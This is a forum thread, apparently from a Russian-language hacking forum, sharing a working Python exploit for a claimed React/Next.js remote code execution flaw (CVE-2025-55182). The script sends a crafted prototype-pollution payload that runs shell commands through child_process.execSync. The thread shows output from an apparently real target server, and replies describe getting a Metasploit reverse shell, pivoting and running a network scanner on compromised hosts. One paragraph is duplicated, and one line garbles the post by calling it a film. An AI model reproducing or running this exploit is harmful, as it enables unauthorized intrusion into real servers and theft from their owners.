• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote React-CVE-2025-55182-RCE

Python:
import requests
import sys
import json

BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
EXECUTABLE = sys.argv[2] if len(sys.argv) > 2 else "id"

crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)
print(res.status_code)
print(res.text)

result:
python main.py http://xx.xxx.xxx.xxx:3005/ "id"
500
0:{"a":"$@1","f":"","b":"yzlV0g1IJ52rwZSmjejoc"}
1:E{"digest":"uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),119(netdev),120(lxd)"}

PoC, как и большинство других, которые вы найдете в открытых источниках, хорошо работает с простыми командами, такими как «id» и «whoami», но когда вы пытаетесь запустить программу в фоновом режиме, это будет сложно, поскольку команды выполняются в подоболочке в JavaScript и сразу же после выполнения завершаются.

PoC, как и большинство других, которые вы найдете в открытых источниках, хорошо работает с простыми командами, такими как «id» и «whoami», но когда вы пытаетесь запустить программу в фоновом режиме, это будет сложно, поскольку команды выполняются в подоболочке в JavaScript и сразу же после выполнения завершаются.
Этот фильм не основан на общедоступном сценарии; он был полностью переписан, и он делает гораздо больше, чем другие.

ну не знаю у меня запускается ревшел меты и робит пока не выйду. только чёт ничего полезного я там не нашёл, если в вине можно хоть как то извратится то там через пивотинг я не одной тачки не нашёл с виндой.. по мне так безполезная бага. гдето даже ./fscan залил и тож пустота.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх